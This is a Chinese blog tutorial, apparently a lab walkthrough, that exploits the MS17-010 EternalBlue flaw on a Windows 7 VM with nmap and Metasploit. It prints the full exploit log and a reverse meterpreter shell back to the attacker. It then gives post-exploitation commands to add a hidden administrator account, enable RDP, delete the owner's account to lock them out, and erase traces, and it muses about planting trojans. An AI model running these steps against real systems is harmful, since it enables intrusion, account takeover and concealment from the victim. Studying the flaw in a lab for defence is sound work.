网络安全-MS17-010漏洞-永恒之蓝
网络安全-MS17-010漏洞-永恒之蓝
这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西
这个东东当时可谓是红极一时,现在也有点热度
这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了
win7靶机安装中(VM虚拟机)
永恒之蓝漏洞原理
通过TCP445端口,445端口(文件共享SMB协议专用)
在那个年代,特别是中国的高校,默认情况下都是开启的,因为内网。去植入病毒。植入病毒後,就可以远程提权,有权限, 就可以干很多事情,可以执行任意代码(包括恶意代码)
WIN7需要的操作
因为现在的win7你拿到的版本都是默认打开的,默认打开则会阻断445端口,无法攻击,所以要手动关,实际上也是很多设备关闭防火墙的。
关闭防火墙
cmd下输入firewall.cpl,两个全部关掉即可
然后把这个远程RDP开起来
在控制面板的系统与安全里面
开启445SMB端口.
找到以下路径
一路找到这个路径然后点击parameters然后右键新建一个项,选32位的命名为SMBDerviceEnabled然后把他的数值数据改成1完了一定要点确认
然后就到kali了
先用nmap扫描一波(nmap是端口扫描工具)
发现了445端口是开启的,其他的暂时不用管
nmap --script smb-vuln-msc17-010.nse x.x.x.x(x为真实ip)
防止你们看不懂,给你们翻译一波
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds
主机脚本结果:|smb-vuln-ms17-010:|易受攻击:|Microsoft SMBv1服务器中的远程代码执行漏洞(ms17-010)|状态:VULNERABLE|ID:CVE:CVE-2017-0143|风险因素:高|Microsoft SMBv1中存在严重的远程代码执行漏洞|服务器(ms17-010)。||披露日期:2017-03-14|参考文献:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap完成:2.21秒内扫描1个IP地址(1个主机启动)
这已经证明可以攻击了,我们平时也不用刻意去翻译,因为做多了你就能看懂了
重点是这个 VULNERABLE:,就证明他是漏洞,脆弱的漏洞
然后输入这个msfconsole,进入msf这个攻击的工具
MSF是啥
简单的说,他就是一个攻击的集成工具包
前面这里会变成msf6
查找漏洞的利用模块
search ms17-010,其中,找出来最上面的那个成功率是最大的
绑定攻击模块相当于武器库里面找到了什么武器
use 0(要用那个模块就选择什么数字)
输入:options
凡是出现yes的,都是需要我们去设置的
这个地方表示的是IP地址
比如啥呢,武器买了回来得会咋用吧,咋开火,打谁你得知道吧,怎么瞄准得会吧
设置攻击目标的IP
set rhosts x.x.x.x x为IP地址
一切就绪,就差执行
run,执行程序
翻译
[*]已在192.168.248.136:4444上启动反向TCP处理程序[*]192.168.248.222:445-使用辅助/scanner/smb/smb_ms17_010作为检查[+]192.168.248.222:445-主机可能对MS17-010不可用!-Windows 7 Professional 7601 Service Pack 1 x64(64位)[*]192.168.248.222:445-已扫描1台主机(共1台)(100%完成)[+]192.168.248.222:445-目标易受攻击。[*]192.168.248.222:445-正在连接到目标进行利用。[+]192.168.248.222:445-已建立用于利用的连接。[+]192.168.248.222:445-选择的目标操作系统对SMB回复指示的操作系统有效[*]192.168.248.222:445-CORE原始缓冲区转储(42字节)[*]192.168.248.222:445-0x0000000057 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7专业版[*]192.168.248.222:445-0x00000010 73 69 f 6e 61 6c 20 37 36 30 20 53 65 72 76项7601服务[*]192.168.248.222:445-0x00000020 69 63 65 20 50 61 63 6b 20 31冰块1[+]192.168.248.222:445-为DCE/RPC回复指示的拱门选择的目标拱门有效[*]192.168.248.222:445-尝试利用12个Groom分配进行攻击。[*]192.168.248.222:445-发送攻击数据包的除最后一个片段之外的所有片段[*]192.168.248.222:445-开始非分页池整理[+]192.168.248.222:445-发送SMBv2缓冲区[+]192.168.248.222:445-关闭SMBv1连接,在SMBv2缓冲区附近创建空闲孔。[*]192.168.248.222:445-正在发送最终SMBv2缓冲区。[*]192.168.248.222:445-正在发送攻击数据包的最后一个片段![*]192.168.248.222:445-从漏洞数据包接收响应[+]192.168.248.222:445-ETERNALBLUE覆盖成功完成(0xC000000D)![*]192.168.248.222:445-将彩蛋发送到损坏的连接。[*]192.168.248.222:445-触发释放损坏的缓冲区。[*]发送阶段(200774字节)到192.168.248.222[*]流量计会话1于2023-02-14 01:49:09+0800打开(192.168.248.136:4444->192.168.248.222:49166)[+] 192.168.248.222:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+]192.168.248.222:445-=-=-=-=--=-==-=-===-=-[-=-==-=-获胜-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.248.222:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
但凡学过英语或者打过游戏都知道WIN=获胜的意思。意思就是证明漏洞已经利用成功了
监听目标主机
Shell(获取对方权限)
shell是最爽的,只要你拿到了shell,跟你直接使用别人电脑没啥区别。但是可以看到乱码了这个没关系
chcp 65001 改一下就好了
可以看到,在kali攻击机上看到的已经是windows 的cmd的命令行了
ipconfig,查看ip地址,本机ip(被攻击ip)
既然都拿到cmd了,那肯定是想干啥就干啥了。
基本上到这里就已经可以宣告对面已经被攻陷了
开始搞事情
既然拿到权限了,那我得远程进去呀,有些事情还是得进去才好呢,虽然也可以不进直接复制他资料搞他什么的
我们可以远程创建一个账户,完了之后搞完事情删除痕迹,那也没人知道呀~
创建用户
因为我们并不知道他原本的账号密码,知道的话还费啥劲渗透,直接登录就完事了
现在还是正常的账户
net user 账户名 密码 /add
net user ccie ccie /add
账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的
但是详细看,我只是标准用户,我要干啥呢?把他变成管理员账户,才能拿到全部权限,然后再把它原本的账户给她干了,他就再也进不来了,咋操作呢?
提权命令
net localgroup administrator 账户名 /add
net localgroup administrator ccie /add
命令行提示已经成功,我们再去看看win7
再来看,我创建的ccie已经是管理员了,在电脑的世界里面管理员没什么是不能做的
那么账户都建立好了
有些电脑他不一定开了远程,那我们就通过命令给他开
run getgui -e
在windows我们可以通过cmd打开mstsc或者手动打开,在kali里面则是用命令
rdesktop 目标IP
desktop就是桌面的意思
那么他这个远程端口就出来了
然后选择其他用户,使用我们刚刚建立的用户
如果无人值守,那也就是30秒的事情
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装
然后我现在干掉原有的账户
在原有的机器上登陆就再也进不来了
.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
如果想不留痕迹,那么干完想干的事情之后,删掉自己的用户,对方也会毫无察觉
网络安全-MS17-010漏洞-永恒之蓝相关推荐
- 利用虚拟机复现漏洞 “永恒之蓝”
利用虚拟机复现漏洞"永恒之蓝" 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程. -- -- &quo ...
- Win7经典漏洞永恒之蓝复现
Win7经典漏洞永恒之蓝复现 环境 信息收集 确定漏洞 渗透 渗透成功后一些常用操作 环境 工具:metaspoilt 模拟攻击机ip:192.168.2.19 靶机ip:192.168.2.22 信 ...
- 网络安全攻击手段之永恒之蓝【MS17_010】利用及漏洞剖析
声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!! 永恒之蓝利用方法 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子 ...
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- 服务器漏洞--永恒之蓝
漏洞问题的简单分析 前言:不扫不知道,一扫吓一跳,原来服务器存在这么多安全隐患:看到这些,可谓祖国江山一片红,下面是解决思路和方式 图中可以发现三类漏洞,服务漏洞,数据库漏洞,服务器本身漏洞. 1.服 ...
- MS17-010 漏洞永恒之蓝445漏洞复现
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 s ...
- 网络安全 基础之 Windows漏洞复现 (MS17-010)永恒之蓝
文章目录 前言 一.永恒之蓝是什么? 二.漏洞复现 1.前期准备 2.漏洞复现 总结 前言 萌新第一次写博客,技术不足之处望求谅解,指出来,一起交流 一.永恒之蓝是什么? 永恒之蓝编号(MS17-10 ...
- SMB协议与永恒之蓝漏洞利用
一,SMB服务 SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件.打印机,串口等,电脑上的网上邻居就是靠他实现的: SMB是一个应用层协议,可以工作在NE ...
- 【网络安全】MS17-010“永恒之蓝”漏洞的利用
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...
最新文章
- 06-图2 Saving James Bond - Easy Version
- 如何在指定的内容中找出指定字符串的个数
- 使用struts2未登录,不能操作
- Windows中MySQL主从数据库搭建(二)
- soapUI接口测试工具所有版本下载地址
- 求字符串转化的最小操作次数 DP动态规划
- 玩转openpyxl,用python制作一个公司租车记录登记表!
- 超震惊!!微软产品经理每天的工作内容竟然是这个...
- MAC如何将[搜狗输入法]设置为默认输入法
- 鼠标悬停图标360度旋转效果
- php faker,Laravel的Faker的使用
- u盘win7纯净版_教你安装纯净版windows系统
- Texpad for Mac v1.9.6 中文版 专业的LaTeX编辑器
- 冷风骑车与贝多芬的命运交响曲
- 90.pygame游戏-玩个球(play the ball)最终版
- latex中文小标题_科学网—一个较为完整的中文图书Latex模板 - 张金龙的博文
- Android旗舰机与苹果,iPhone SE与最强Android旗舰机相比会如何
- STM32CubeMx + LWIP(实现UDP组播/MQTT/热插拔)系列 二 ----- CubeMx生成文件的简单介绍与热插拔
- 沐曦加入龙蜥社区,聚焦技术创新,繁荣开源生态
- 服务器架设了网站还能架设游戏吗,云服务器可以架设游戏吗